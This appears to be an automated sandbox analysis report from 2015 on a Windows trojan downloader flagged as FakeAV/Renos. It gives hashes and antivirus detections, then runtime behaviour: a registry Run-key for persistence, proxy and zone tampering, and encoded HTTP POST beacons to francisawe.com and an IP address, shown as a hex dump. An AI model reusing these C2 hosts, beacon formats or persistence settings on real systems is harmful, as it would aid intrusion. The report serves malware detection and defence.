Analysis Date2015-01-17 17:34:40
MD5ee1d807d757ef0c31aecd9383688900b
SHA18f267aac400931ee441177e97d1760ba2e783aa6

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a288a97b10b6ca4056a79dcf34f1944d sha1: b6bee984d774cdd9e2df209f5352863f32f8a6d2 size: 7680
Section.data md5: b2f28b3769e36ebab61632b35ce72c1f sha1: f3a1d154ea786e8246116d64720e873976524c24 size: 13312
Section.bss md5: 14f24e468ad3e681067a7853adbb18a6 sha1: a62f3593dd9e62584a54ea5a05dfe56c145c324d size: 109568
Section.idata md5: 62bc5bae3566db8b4ecfa50422bc2598 sha1: 34a66c350bf6d01ad375107afcd08cb9c104e7d1 size: 3072
Section.rsrc md5: abc084c4f497a76b9eb2cf808b01f0e1 sha1: 2ca98422e89fc3ef12a7f080caa000e00c2c0d30 size: 4096
Timestamp2010-01-01 06:41:57
VersionLegalCopyright: Copyright © 2010 PC Tools. Q3 All rights reserved. n
InternalName: magPZh.exe
FileVersion: 7.0.0.61
CompanyName: videosoft
LegalTrademarks:
Comments:
ProductName: t I3
ProductVersion: 7.0.0.61
FileDescription: cVideo ComponentcY
OriginalFilename: magPZh.exe
PackerBorland Delphi 4.0
PEhash01ea4012fffd4b2c403d20a96ad9a22cc3bbc3e1
IMPhash177045aec32ebcb26cafbcb48f03c62d
AV360 Safeno_virus
AVAd-AwareGen:Variant.Kazy.20846
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Gen:Variant.Kazy.20846
AVAuthentiumW32/FakeAlert.KN.gen!Eldorado
AVAvira (antivir)TR/Jorik.G.2
AVBullGuardGen:Variant.Kazy.20846
AVCA (E-Trust Ino)Win32/Renos.D!generic
AVCAT (quickheal)Trojan.Renos.LN
AVClamAVTrojan.Jorik-154
AVDr. WebTrojan.DownLoader5.6150
AVEmsisoftGen:Variant.Kazy.20846
AVEset (nod32)Win32/TrojanDownloader.FakeAlert.BGV
AVFortinetW32/Diple.IZ!tr
AVFrisk (f-prot)W32/FakeAlert.KN.gen!Eldorado
AVF-SecureGen:Variant.Kazy.20846
AVGrisoft (avg)Generic22.VVJ
AVIkarusTrojan.Win32.Jorik
AVK7Riskware ( 0040eff71 )
AVKasperskyHoax.Win32.FlashApp.gen
AVMalwareBytesTrojan.Downloader
AVMcafeeDownloader-CEW.ap
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos.PT
AVMicroWorld (escan)Gen:Variant.Kazy.20846
AVRisingTrojan.Win32.Generic.12866C70
AVSophosMal/FakeAV-IZ
AVSymantecTrojan.FakeAV
AVTrend MicroTROJ_AGENT.SMAH
AVVirusBlokAda (vba32)SScope.Trojan.ExpProc.019

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GHWAUC6NNZ ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\GHWAUC6NNZ\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS30.157.231.171
Winsock DNSfrancisawe.com
Winsock DNSspanishser.com

Network Details:

DNSwebcache.foreign.ccgslb.com
Type: A
58.68.168.250
DNSwebcache.foreign.ccgslb.com
Type: A
65.255.44.2
DNSwebcache.foreign.ccgslb.com
Type: A
209.177.90.10
DNSwebcache.foreign.ccgslb.com
Type: A
209.177.92.6
DNS58.com
Type: A
211.151.111.30
DNShatena.ne.jp
Type: A
59.106.194.19
DNSfrancisawe.com
Type: A
192.64.178.149
DNSdergeneral.com
Type: A
54.209.61.132
DNSpeople.com.cn
Type: A
DNSspanishser.com
Type: A
DNSvawsofort.com
Type: A
HTTP POSThttp://francisawe.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://30.157.231.171/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 192.64.178.149:80
Flows TCP192.168.1.1:1032 ➝ 30.157.231.171:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6672616e 63697361 77652e63 6f6d0d0a   francisawe.com..
0x000000b0 (00176)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000c0 (00192)   3334310d 0a436f6e 6e656374 696f6e3a   341..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000e0 (00224)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000f0 (00240)   61636865 0d0a0d0a 64617461 3d2f436a   ache....data=/Cj
0x00000100 (00256)   45665a44 53767871 43694b30 6c74554d   EfZDSvxqCiK0ltUM
0x00000110 (00272)   31757932 2f797534 55355970 4e6d3176   1uy2/yu4U5YpNm1v
0x00000120 (00288)   2f2f6a54 6e675663 2b774d73 2b2b5a42   //jTngVc+wMs++ZB
0x00000130 (00304)   6a375a53 59547233 69426b47 2f672b37   j7ZSYTr3iBkG/g+7
0x00000140 (00320)   5643432f 31396b66 694f4870 37655263   VCC/19kfiOHp7eRc
0x00000150 (00336)   48506959 6f393930 4d55756a 67555734   HPiYo990MUujgUW4
0x00000160 (00352)   62765449 644e2f6a 50587547 506a6142   bvTIdN/jPXuGPjaB
0x00000170 (00368)   7a786c63 63356d70 4e303161 36742f51   zxlcc5mpN01a6t/Q
0x00000180 (00384)   69535858 77707a39 486d306b 7a396642   iSXXwpz9Hm0kz9fB
0x00000190 (00400)   6661556e 3130782f 474c636f 66526948   faUn10x/GLcofRiH
0x000001a0 (00416)   344c7646 73416947 59467361 696f4d57   4LvFsAiGYFsaioMW
0x000001b0 (00432)   30374b30 4533726b 6b334d65 5a557967   07K0E3rkk3MeZUyg
0x000001c0 (00448)   44654c47 77327331 322b6f50 4d4e726e   DeLGw2s12+oPMNrn
0x000001d0 (00464)   4a5a637a 687a5a38 78694e57 75355467   JZczhzZ8xiNWu5Tg
0x000001e0 (00480)   4f687134 4f715553 30424d54 644b3262   Ohq4OqUS0BMTdK2b
0x000001f0 (00496)   5a792f68 7833546e 6d477954 464c4868   Zy/hx3TnmGyTFLHh
0x00000200 (00512)   4c635266 2b76417a 494f424e 6d763433   LcRf+vAzIOBNmv43
0x00000210 (00528)   43444b32 51303541 56636d41 38324b68   CDK2Q05AVcmA82Kh
0x00000220 (00544)   54665573 732f476f 6c77786c 6d396b4c   TfUss/Golwxlm9kL
0x00000230 (00560)   6e726e6c 49365a67 366e3336 642f3334   nrnlI6Zg6n36d/34
0x00000240 (00576)   6b6f4656 78627151 6a2b673d 3d         koFVxbqQj+g==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   33302e31 35372e32 33312e31 37310d0a   30.157.231.171..
0x000000b0 (00176)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000c0 (00192)   3334310d 0a436f6e 6e656374 696f6e3a   341..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000e0 (00224)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000f0 (00240)   61636865 0d0a0d0a 64617461 3d2f436a   ache....data=/Cj
0x00000100 (00256)   45665a44 53767871 43694b30 6c74554d   EfZDSvxqCiK0ltUM
0x00000110 (00272)   31757932 2f797534 55355970 4e6d3176   1uy2/yu4U5YpNm1v
0x00000120 (00288)   2f2f6a54 6e675663 2b774d73 2b2b5a42   //jTngVc+wMs++ZB
0x00000130 (00304)   6a375a53 59547233 69426b47 2f672b37   j7ZSYTr3iBkG/g+7
0x00000140 (00320)   5643432f 31396b66 694f4870 37655263   VCC/19kfiOHp7eRc
0x00000150 (00336)   48506959 6f393930 4d55756a 67555734   HPiYo990MUujgUW4
0x00000160 (00352)   62765449 644e2f6a 50587547 506a6142   bvTIdN/jPXuGPjaB
0x00000170 (00368)   7a786c63 63356d70 4e303161 36742f51   zxlcc5mpN01a6t/Q
0x00000180 (00384)   69535858 77707a39 486d306b 7a396642   iSXXwpz9Hm0kz9fB
0x00000190 (00400)   6661556e 3130782f 474c636f 66526948   faUn10x/GLcofRiH
0x000001a0 (00416)   344c7646 73416947 59467361 696f4d57   4LvFsAiGYFsaioMW
0x000001b0 (00432)   30374b30 4533726b 6b334d65 5a557967   07K0E3rkk3MeZUyg
0x000001c0 (00448)   44654c47 77327331 322b6f50 4d4e726e   DeLGw2s12+oPMNrn
0x000001d0 (00464)   4a5a637a 687a5a38 78694e57 75355467   JZczhzZ8xiNWu5Tg
0x000001e0 (00480)   4f687134 4f715553 30424d54 644b3262   Ohq4OqUS0BMTdK2b
0x000001f0 (00496)   5a792f68 7833546e 6d477954 464c4868   Zy/hx3TnmGyTFLHh
0x00000200 (00512)   4c635266 2b76417a 494f424e 6d763433   LcRf+vAzIOBNmv43
0x00000210 (00528)   43444b32 51303541 56636d41 38324b68   CDK2Q05AVcmA82Kh
0x00000220 (00544)   54665573 732f476f 6c77786c 6d396b4c   TfUss/Golwxlm9kL
0x00000230 (00560)   6e726e6c 49365a67 366e3336 642f3334   nrnlI6Zg6n36d/34
0x00000240 (00576)   6b6f4656 78627151 6a2b673d 3d         koFVxbqQj+g==


Strings
#+Y
040904E4
 2010  PC Tools. Q3 All rights reserved. n
56ox
7.0.0.61
&About
BBABORT
BBALL
BBCANCEL
Comments
CompanyName
Copyright 
cVideo ComponentcY
E&xit
&File
FileDescription
FileVersion
InternalName
LegalCopyright
LegalTrademarks
magPZh.exe
MAINMENU(
mFJn
&Open
OriginalFilename
ProductName
ProductVersion
StringFileInfo
t I3
Translation
VarFileInfo
videosoft
VS_VERSION_INFO
zHfI
 /$)($,
;00tq/
'%02x% ?#
+05238
07q	+i
(?0	8eL
 0[=d*n=fWE
0?D	Xeh
0}$/+I
;0+m,(
?#\?0S@
^:*0u	
16354VZ
17/P^^
19PM-,
1eq=RO
^1L$Hr
1mV=>l
1N6oa/
1$s!$E
<(2/8	Xed
2m.tex
'32PNyx
:33:"$
"*"$33
3333:"$
333333
3333333
$3333333
33333333
33333333?333333
333333333333333333
3333333333333338
333333:"33333338
33333:"$3333338
3333339
333338
33333833
#33338
:*"*"$3338
333838
334C33333338
33B$3333333
34""C33333833
3B""$33333
3Dhdx@
\3)}p87
3sWY9WXfRUj7o
}3t\;mZ
|{;$!4
4"*""C3338
$$	4e<
_4`eMa
$4?H	\et
,-5a@'
5f<9u_
5IS%XI
5MS}.az
63Q*T'
7;52J@
76KHk	
76mc	:]\
_7aRP	]K
7nFIQP
7PqvOt0p\
7ZYDhW
89	-':
?(	8e@
8$&he)
$8i2(N
8yn'a79
97HYlp
9H9NhAmPAm
9~--t@
9Wf3sN1
9%z:}tl
A(0VSi
aAp2r 2
ActivateKeyboardLayout
aee/8]
aHmrbD
AhSb@r
  </application> 
  <application> 
aSBSMzfSVx
AsQ$aR
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows - Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
*Atb_dYa
atO?>k
% B&	?
B0EIP0D
B_(1gf
B!9y	I
$BMJ6d)
b-V4}WE|
"C3338
;c5KS[
c5\+WS
"C8338
CallNextHookEx
CharUpperA
CheckMenuItem
CloseClipboard
CloseHandle
C=mc~*:
>c*NhI
comctl32.dll
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CreateIcon
CreateMenu
CreatePopupMenu
CreateThread
CreateWindowExA
C	$ w6
`.data
dCo_Duo-inVcEy?o
DeleteMenu
DIj_b<
?,dp1$
?D	Peh
$>DpkE
DrawAnimatedRects
DrawIcon
DrawMenuBar
DrawTextA
d&y*9u&
?$	(e0
}E1'(H}
? 	,e4
e6kOYP
e`G@@	%nEIxc
e#@h>}z
eJ_\p0h
ek9uxHpY4ncRwp@16
EnableMenuItem
EnableScrollBar
EndDialog
EnterCriticalSection
EnumThreadWindows
eO:47R?
EqQGqI
EqualRect
EsjPkL&M
ExitProcess
><'f\	
f,$0[$=4)O
f16=@T
fgJ88=
FindClose
F|MiBfQ
+F#?_nY
fokz|F
g0SdV1
GetActiveWindow
GetCurrentProcess
GetCurrentThread
GetDCEx
GetDesktopWindow
GetForegroundWindow
GetKeyboardLayoutNameA
GetKeyboardState
GetKeyboardType
GetMenu
GetMenuItemID
GetModuleHandleA
GetModuleHandleW
GetScrollInfo
GetScrollRange
GetSubMenu
GetSysColorBrush
GetSystemMenu
GetSystemMetrics
GetTickC3oun_
GetTickCount
GetTopWindow
GetUserDefaultLCID
GetWindow
GetWindowDC
GetWindowLongA
GetWindowThreadProcessId
#\'GN7
g&%n!I
g?o_9X
%h9.yA
HeapAlloc
HeapDestroy
Hjq _T
HPjaxoo
(hRS(N
"HuRWy%>
I3d<bI9xo
I5(;~Du
\:IbU<
@.idata
]IJ:iT
ImageList_Destroy
ImageList_DragShowNolock
ImageList_Draw
ImageList_DrawEx
ImageList_Remove
ImageList_Write
InsertMenuA
"IP<8|d
IsCharUpperA
IsChild
IsDlgButtonChecked
IsWindow
IsWindowEnabled
IsWindowVisible
,ItJUT
Iw% e2
=iY7z_
iyxxi$
%:%_(}j@
"J333333
"J"C3333
jg[t@!Al
Jiv|/[C
JLb	S/
jmeUn5OY
$-j=pH(
jY6yyO3
k0	sAN?c
KBcw<X;
Kd4FL#
.#K+e|
kEO_9}
kernel32.dll
LcWnx	
lnY25FOy0
LoadLibraryA
LoadStringA
LocalAlloc
LocalReAlloc
=LQc3&
lS[kCdk
lstrcpynA
lstrlenA
l?t	|e
lt<$@Q
lzbNcpl
_m4cpy9
M8_$tDA
magPZh.exe
main.cpl
MapWindowPoints
mCTkJey@24
|me*|$
mfbiEQwQ
MlVftn@20
M,MAdHG
;<:mmP`
\MOSW|
MoveFileA
	m\pwe
ms2-d.
MulDiv
mulDo:$G
MWS$CP60t
mzi7}U
;&MZuyRbL
n7}&@l"
NEds8hbZ4@20
"NFtYX
@NKH2&
O9_toz
Ob67{3dYrD
-odSxI
OemToCharA
\#oISl
`/OLEAUT
o.o"l'
OsG~-Y
o}x[gS
<P;e5K
Phh3$b
Ppv6j*
&P\vh-
P=WBRb
pyLf?/
P^Yu9^g(
Q (i3%
Qj`8S+_;
QjO)C)"
*q#lWV
]/-QR(
qssIvxmcgcXrN_
QuY4lEOjosJ9e@20
>QyH!doA
!]$R.*
	'R;8/
RedrawWindow
RegisterClipboardFormatA
RemoveMenu
Re-^[Q
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
rMPbTC
r;p}%;
\:',RrU
rs%\DW
@.rsrc
R<(^u,SjX
rU,tDC
rZD!faul;IZL
"$SA|l
=sc12o
      </security>
      <security>
SetCursor
SetFilePointer
SetFocus
SetForegroundWindow
SetScrollPos
SetScrollRange
SetTimer
SetWindowLongW
s!Focg
'S"HesT&!u
SHLWYl
!sionm
,+Sj$P
&|SK$:
sKN]&=
	Sm%l\
S/QW8]
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
&(SViiwW	h
	swmW{
t(/.\$
t%@:{	
T/9W?9
TFvIu0
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
TMs_2,m
;TNh!ad]
TrackPopupMenu
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
?		$}U
:u:as9_t
'}uBI5
ULGtWi
UN*IQSTRs
UnregisterClassA
user32.dll
uttgl3gOTod
 _u?uX
/uz$;a[c
V1U3|B+5
vc.Z<T>
Vh8%P!
VirtualAllocEx
vnM+`.rd
?Vt0CriE
wj_>Cx
WlCUxK
WOa&	${F6
wsprintfA
/WV@P 
W\wX\(a
Wx1Wo`
Wy_ybU
X?\	del
@?X	dep
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
xoEcKp
=xt	;;]
xU:Z)M
xYJ{=.
YD%j1e0
y/FPkWb
YGe}*|
YgZRI59nuAyJ_@16
=YKu<i
yKZhRHD
Y%OX!<
<y(QSPK
yw%_,Qo
Y	\y~{
~y$^[zH
Z59i&?
Z7givw_BTsNfdi@4
z$FSE+
 ,ZNNc
ZumyvvYVBYlw5O@4